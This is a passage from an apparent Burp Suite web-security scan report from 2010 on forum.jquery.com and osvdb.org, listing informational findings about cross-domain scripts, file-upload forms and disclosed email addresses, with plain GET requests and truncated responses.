Set-Cookie: JSESSIONID=05CE8F1E0AE7F496B5A09850FA785AAB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:29:52 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.19. http://forum.jquery.com/user/wycats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/wycats

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/wycats HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=25EEAA759D352A30C3AA8E23615DFCFD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:10 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.20. http://osvdb.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://osvdb.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: osvdb.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=178338106.1286680872.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=178338106.713127995.1286680872.1286692001.1287528467.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 02:45:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "46336199e77ce7e6bebae2bcb4884e09"
X-Runtime: 654
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _session_id=a02d1064db8b95f8cb722d0f270d56bf; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>OSVDB: The Open
...[SNIP]...
<div style="width:605px;margin-right:auto;margin-left:auto;">

<script type="text/javascript" src="http://opensecurityfoundation.org/projects/1.js?version=osvdb_1"></script>
...[SNIP]...
</p>
   
       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

7. File upload functionality
There are 15 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:


7.1. http://forum.jquery.com/about-the-jquery-forum

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /about-the-jquery-forum

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /about-the-jquery-forum HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5B7FED8F2238C535DF4F28A8A27FB530; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.2. http://forum.jquery.com/developing-jquery-plugins

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-plugins

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /developing-jquery-plugins HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=31A3A3697572135978EA43A4B3445CA3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.3. http://forum.jquery.com/jquery-conferences

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-conferences

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /jquery-conferences HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E9EAA61A3D158993FEA0827C700963BF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:54 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.4. http://forum.jquery.com/jquery-mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-mobile

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=146CD0CCDD0B8E3BD799AAF98F5C892D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:29 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.5. http://forum.jquery.com/qunit-and-testing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /qunit-and-testing

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /qunit-and-testing HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E5466414448844E9BCAEB960C7DE0267; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:56 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.6. http://forum.jquery.com/topic/how-can-i-help-9-5-2010

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/how-can-i-help-9-5-2010

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /topic/how-can-i-help-9-5-2010 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=ECE9699A2EDA73BBD1A86295BA681CEC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.7. http://forum.jquery.com/topic/looking-for-help-on-panel-development

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/looking-for-help-on-panel-development

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /topic/looking-for-help-on-panel-development HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=824525F306F33D1A660A41D747B3C3C5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:19 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.8. http://forum.jquery.com/user/andrew_powell

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/andrew_powell

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /user/andrew_powell HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=16C254095C2124D65EE64E94307DBCA0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:14 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.9. http://forum.jquery.com/user/charlietfl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/charlietfl

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /user/charlietfl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=59CEF57F096606606E0C367A9D77EDCB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.10. http://forum.jquery.com/user/christophe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/christophe

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /user/christophe HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DA6C6F3D4597C88D4576CA4F90C364C0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:46 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.11. http://forum.jquery.com/user/jeresig

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/jeresig

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /user/jeresig HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6B51C808310C43BC59A7FCE896A79140; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:01 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.12. http://forum.jquery.com/user/kbwood.au

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/kbwood.au

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /user/kbwood.au HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E6A0387222674E9994B5F79EBEB4FA46; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.13. http://forum.jquery.com/user/malsup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/malsup

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /user/malsup HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:23:18 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.14. http://forum.jquery.com/user/scottjehl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/scottjehl

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /user/scottjehl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=05CE8F1E0AE7F496B5A09850FA785AAB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:29:52 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

7.15. http://forum.jquery.com/user/wycats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/wycats

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /user/wycats HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=25EEAA759D352A30C3AA8E23615DFCFD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:10 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
</label>
<input name = "imageFileName" type="file">
<span id="image_error" class="flRight">
...[SNIP]...

8. Email addresses disclosed
There are 9 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


8.1. http://forum.jquery.com/developing-jquery-mobile/feed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-mobile/feed

Issue detail

The following email address was disclosed in the response:

Request

GET /developing-jquery-mobile/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=42A9B18DCA94367EB89AE1F90A3E8A5E; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:31 GMT
Server: Apache-Coyote/1.1
